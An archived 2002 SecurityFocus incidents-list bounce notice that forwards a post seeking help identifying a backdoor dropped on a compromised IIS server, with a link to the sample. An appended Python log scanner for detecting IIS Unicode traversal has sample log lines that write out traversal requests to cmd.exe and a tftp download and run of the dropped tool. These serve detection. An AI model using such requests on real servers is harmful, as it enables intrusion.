incidents-help_at_securityfocus.com
Date: Mon Jul 22 2002 - 14:47:34 CDT


    Hi! This is the ezmlm program. I'm managing the
    incidents@securityfocus.com mailing list.

    I'm working for my owner, who can be reached
    at incidents-owner@securityfocus.com.

    Messages to you from the incidents mailing list seem to
    have been bouncing. I've attached a copy of the first bounce
    message I received.

    If this message bounces too, I will send you a probe. If the probe bounces,
    I will remove your address from the incidents mailing list,
    without further notice.

    I've kept a list of which messages from the incidents mailing list have
    bounced from your address.

    Copies of these messages may be in the archive.

    To retrieve a set of messages 123-145 (a maximum of 100 per request),
    send an empty message to:
       <incidents-get.123_145@securityfocus.com>

    To receive a subject and author list for the last 100 or so messages,
    send an empty message to:
       <incidents-index@securityfocus.com>

    Here are the message numbers:

       3679
       3690
       3681
       3686
       3688
       3689
       3685
       3692
       3680
       3691
       3687
       3684
       3682
       3683
       3698
       3694
       3697
       3693
       3695
       3696
       3699
       3700
       3702
       3701
       3703
       3704
       3705
       3706
       3708
       3707
       3711
       3709
       3710
       3712
       3713
       3714
       3715
       3716
       3717
       3718
       3719
       3720
       3721
       3722
       3723
       3724
       3725
       3726
       3727
       3729
       3728
       3730
       3732
       3731
       3733
       3734
       3735
       3737
       3736
       3738
       3739
       3740
       3741
       3742
       3743
       3744

    --- Enclosed is a copy of the bounce message I received.

    Return-Path: <>
    Received: (qmail 31734 invoked from network); 11 Jul 2002 00:18:42 -0000
    Received: from unknown (HELO securityfocus.com) (66.38.151.9)
      by lists.securityfocus.com with SMTP; 11 Jul 2002 00:18:42 -0000
    Received: (qmail 13763 invoked by alias); 11 Jul 2002 00:15:05 -0000
    Received: (qmail 13759 invoked from network); 11 Jul 2002 00:15:05 -0000

      by mail.securityfocus.com with SMTP; 11 Jul 2002 00:15:05 -0000

            id 5C51A17BFE; Wed, 10 Jul 2002 19:21:59 -0500 (CDT)
    Date: Wed, 10 Jul 2002 19:21:59 -0500 (CDT)

    Subject: Undelivered Mail Returned to Sender

    MIME-Version: 1.0
    Content-Type: multipart/report; report-type=delivery-status;


    This is a MIME-encapsulated message.

    Content-Description: Notification
    Content-Type: text/plain

    I'm sorry to have to inform you that the message returned
    below could not be delivered to one or more destinations.

    For further assistance, please send mail to <postmaster>

    If you do so, please include this problem report. You can
    delete your own text from the message returned below.

                            The Postfix program

        /home/httpd/archives-mbox/current.mbox: error writing message: File too
        large

    Content-Description: Delivery error report
    Content-Type: message/delivery-status

    Arrival-Date: Wed, 10 Jul 2002 19:21:59 -0500 (CDT)

    Action: failed
    Status: 5.0.0
    Diagnostic-Code: X-Postfix; cannot append message to destination file
        /home/httpd/archives-mbox/current.mbox: error writing message: File too
        large

    Content-Description: Undelivered Message
    Content-Type: message/rfc822

    Received: from outgoing.securityfocus.com (outgoing3.securityfocus.com [66.38.151.27])


    Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19])
            by outgoing.securityfocus.com (Postfix) with QMQP
            id DA140A3A47; Wed, 10 Jul 2002 16:46:50 -0600 (MDT)
    Mailing-List: contact incidents-help@securityfocus.com; run by ezmlm
    Precedence: bulk
    List-Id: <incidents.list-id.securityfocus.com>
    List-Post: <mailto:incidents@securityfocus.com>
    List-Help: <mailto:incidents-help@securityfocus.com>
    List-Unsubscribe: <mailto:incidents-unsubscribe@securityfocus.com>
    List-Subscribe: <mailto:incidents-subscribe@securityfocus.com>
    Delivered-To: mailing list incidents@securityfocus.com
    Delivered-To: moderator for incidents@securityfocus.com
    Received: (qmail 25799 invoked from network); 10 Jul 2002 21:54:19 -0000
    From: "Matt Andreko" <mandreko@ori.net>
    To: <incidents@securityfocus.com>
    Subject: Can anyone identify this backdoor?
    Date: Wed, 10 Jul 2002 16:58:06 -0500
    Message-ID: <026601c2285c$df572dd0$173625d8@ori.net>
    MIME-Version: 1.0
    Content-Type: text/plain;
            charset="us-ascii"
    Content-Transfer-Encoding: 7bit
    X-Priority: 3 (Normal)
    X-MSMail-Priority: Normal
    X-Mailer: Microsoft Outlook, Build 10.0.3416
    Importance: Normal
    X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

    Apparently over the holiday, one of my client's machines was broken
    into. It was running Windows 2000 Pro, with IIS installed (webserver
    only, no FTP, SMTP, etc.). Apparently the attacker got in through this. The
    logs show some Unicode in the requests, so I'd bet that's it.

    A file was deposited in the c:\winnt\system32\ folder named "cc.exe". I
    have studied it a little bit, and it seems quite interesting. It's
    actually a WinRAR self-executable file. Inside it contains what I believe
    is a stripped-down copy of the Serv-U FTP server, messages for that server,
    and some other interesting tools. There's a cmd.exe file, which doesn't
    match the size of the one in c:\winnt\system32, so it could be
    backdoored.

    I was basically wondering if anyone had seen anything like it, or could
    identify it. I have put a copy up temporarily on my webserver at
    http://www.criminalsmostly.com/~mandreko/cc.zip

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
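The poster's guess that the attacker came in through "Unicode in the requests" is something that can be confirmed from the IIS W3C logs rather than eyeballed. The script below is an added example for this archive page, not code from the original post or from SecurityFocus: it canonicalizes each logged request path the way the vulnerable IIS did (repeated percent-decoding, so %255c becomes a backslash, plus acceptance of overlong UTF-8 such as %c0%af for "/" and %c1%9c for "\"), then flags traversal segments that only appear after decoding, requests that resolve to cmd.exe, and query strings that pull a tool onto the box. The log lines are constructed for illustration, and the field order assumes the default W3C extended layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).

```python
"""
Check an IIS W3C extended log for the Unicode / double-decode traversal the
poster suspects was used to reach cmd.exe and drop cc.exe.

Added example for this archive page; the sample log lines below are
constructed for illustration and are not from the reported incident.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_to_bytes

# Constructed sample in the default W3C extended field order
# (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-07-05 03:12:41 192.0.2.10 GET /default.htm - 200
2002-07-05 03:12:44 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-07-05 03:12:51 192.0.2.10 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+tftp+-i+192.0.2.10+GET+cc.exe+c:\\winnt\\system32\\cc.exe 502
2002-07-05 03:13:02 192.0.2.10 GET /msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe /c+c:\\winnt\\system32\\cc.exe 200
2002-07-05 03:15:10 198.51.100.4 GET /images/logo.gif - 200
"""

# A ".." path segment, after slashes have been normalised to "/".
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
# Query-string markers for fetching or running a dropped tool.
TOOL_MARKERS = ("tftp", "cc.exe")


def fold_overlong_utf8(data: bytes) -> bytes:
    """Replace overlong two-byte UTF-8 sequences (lead byte 0xC0/0xC1) with the
    ASCII byte they encode: C0 AF -> '/', C1 9C -> '\\'. A strict decoder
    rejects these; the vulnerable IIS path canonicaliser accepted them."""
    out = bytearray()
    i = 0
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def canonicalize(uri: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (so %255c -> %5c -> '\\') and fold overlong
    UTF-8 after each round, then normalise slashes and case. The result is the
    path the server would actually have acted on, not the one that was logged."""
    current = uri.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = fold_overlong_utf8(unquote_to_bytes(current))
        if decoded == current:
            break
        current = decoded
    return current.decode("latin-1").replace("\\", "/").lower()


def analyse_line(line: str) -> Optional[Dict[str, object]]:
    """Return findings for one log line, or None for headers and benign requests."""
    if not line.strip() or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) < 7:
        return None
    _date, time, client, _method, stem, query, status = fields[:7]
    canon_stem = canonicalize(stem)
    canon_query = canonicalize(query)
    reasons: List[str] = []
    if TRAVERSAL.search(canon_stem):
        # Traversal that only shows up after decoding was hidden by the encoding.
        plain = stem.replace("\\", "/").lower()
        reasons.append("traversal" if TRAVERSAL.search(plain) else "encoded-traversal")
    if canon_stem.endswith("/cmd.exe"):
        reasons.append("cmd.exe")
    if any(marker in canon_query for marker in TOOL_MARKERS):
        reasons.append("tool-transfer")
    if not reasons:
        return None
    return {
        "time": time,
        "client": client,
        "status": status,
        "raw": stem,
        "canonical": canon_stem,
        "reasons": reasons,
    }


def scan(log_text: str) -> List[Dict[str, object]]:
    """Run analyse_line over every line and keep the hits, in log order."""
    hits = []
    for line in log_text.splitlines():
        finding = analyse_line(line)
        if finding:
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} [{', '.join(hit['reasons'])}] "
              f"{hit['raw']} -> {hit['canonical']}")
```

Because canonicalize() is a no-op on a path that contains no percent escapes, the same check works whether the server logged the stem raw or already partly decoded; the "encoded-traversal" label is the one that matters here, since a plain "../" would have been rejected by IIS and only the encoded forms got through.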